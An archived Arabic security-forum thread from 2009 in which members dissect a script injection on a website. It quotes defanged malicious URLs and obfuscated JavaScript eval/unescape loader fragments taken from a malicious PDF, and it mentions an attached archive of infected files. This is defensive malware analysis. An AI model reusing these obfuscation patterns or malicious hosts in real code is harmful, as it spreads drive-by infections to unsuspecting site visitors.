الفريق العربي للبرمجةأرشيف المنتديات · 2000 – 2023
نسخة أرشيفية للقراءة فقط — التسجيل والمشاركة مغلقان، والمحتوى محفوظ كما كان.

ما رأيك بهذا الاستغلال؟

بدأه Xacker في 13 نوفمبر 2009 · 4 رد · 971 مشاهدة · في قسم أمن المعلومات العام
مشاركة: واتساب X فيسبوك تيليجرام
#1 صاحب الموضوع

السلام عليكم،

أحد مواقع أصدقاءنا تعرض لاختراق البارحة وتم حقن الصفحات فيه بسكربتات (من خلال <script src="path to malicious script"></script>).. لا أعلم تماماً ما الإجرائيات التي تم اتخاذها منذ البارحة فكما أرى اليوم تم تغيير الرابط إلى آخر ويحوي استغلال أعقد مما كان عليه في البداية (ربما تم تنظيف الموقع المستضيف للـ payload السابق)

حالياً الاستغلال الحالي يشير إلى الرابط: hXXp://mesgurukula.com/yahoo_site_admin/index.php (لغير المختصين، لا تقم بنسخ الرابط وفتحه حتى لا تعرض نفسك لإصابة!)

والذي يحوي على الكود التالي:

post-7008-1258110750_thumb.png

حالياً، Avast AV لا يقوم باكتشاف ما يحدث على عكس الاستغلال السابق في الموقع، سأقوم بإرسال رسالة لقسم الدعم حالاً بالمواقع التي تحوي على الصفحات الخبيثة..

آراؤكم؟ (خلونا نشوف شوية أكشن :lol: )

Do as I say, not as I do

We are Anonymous. We are Legion. We don't forgive. We don't forget

#2

السلام عليكم،

تغير المحتوى، مرة أخرى، هل يتعلق الأمر بوقت معين خلال ساعات النهار مثلاً؟

لو نحصل فقط على نسخة من ملف index.php هذا..

post-7008-1258114808_thumb.png

الروابط الظاهرة ضمن الاستغلال، بالطبع، تقوم بتحميل بعض الملفات بغرض تشغيلها في نظام المستخدم الزائر..

أحد الملفات يحوي على سكربت JS التالي

VlT=24;
 if(app.alert)VlT++;
 diS4p=this;
 fci=unescape;
 iOFj=diS4p.info;
 VlT=fci('%'+VlT);
 IyKmM=iOFj.Trailer.replace(/[A-Z]/g,VlT);
 eval(fci(IyKmM))

وبعد التحسين

eval(unescape(this.info.Trailer.replace(/[A-Z]/g,'%');

وفي الرابط الآخر يتم تحميل ملف هو عبارة عن ملف SWF (ShockWave File)

في المرفقات الملفين المذكورين. الملف محمي بكلمة سر virus (لغير المختصين، محاولة تشغيل الملفات السابقة في متصفحك أو من خلال برامج Adobe قد يؤدي إلى إصابة نظامك)

ما لفت انتباهي في ملف PDF هو...

post-7008-1258119081_thumb.png

post-7008-1258119156_thumb.png

happy digging

infected_files.rar

Do as I say, not as I do

We are Anonymous. We are Legion. We don't forgive. We don't forget

#3

مممم

الكود الآن تغير نوعا ما

هو الآن يعطى

oo7=unescape;
AMlJ=24;
if(document.getElementById) AMlJ='';
Cgr=oo7('%'+AMlJ);
var Xbhl='';
CUs=oo7(Xbhl.replace(/[QAm]/g,Cgr));
eval(CUs);

أسماء المتغيرات تتغير كل مرة طبعا بعد التحسين

eval(unescape(Xbhl.relace(/[QAm/g,%])));

المشكلة إن قيمة المتغير Xbhl لا تحتوى على شئ و بالتالى نتيجة ال replce لا شئ و هكذا حتى نصل إلى الدالة eval التى لن تنفذ شيئا

أنا متحير جدا فالكود ينقصه شئ

تم تعديل هذه المشاركة بواسطة net_code في 14 نوفمبر 2009 في 19:07

لا تراجع و لا إستسلام

#4

ما يظهر لك يظهر لي في معظم الأوقات.. أعتقد أن هناك شئ ما يجعل صفحة الـ PHP تضع الكود المؤذي

يجب أن نحصل على نسخة حتى تكتمل الصورة.

Do as I say, not as I do

We are Anonymous. We are Legion. We don't forgive. We don't forget

#5

عودة أخرى مع رابط آخر تم حقنه في الموقع..

hXXp://alltrade-poland.pl/upload/style.php

والاستغلال الآن

post-7008-1258892075_thumb.png

Do as I say, not as I do

We are Anonymous. We are Legion. We don't forgive. We don't forget

مواضيع مشابهة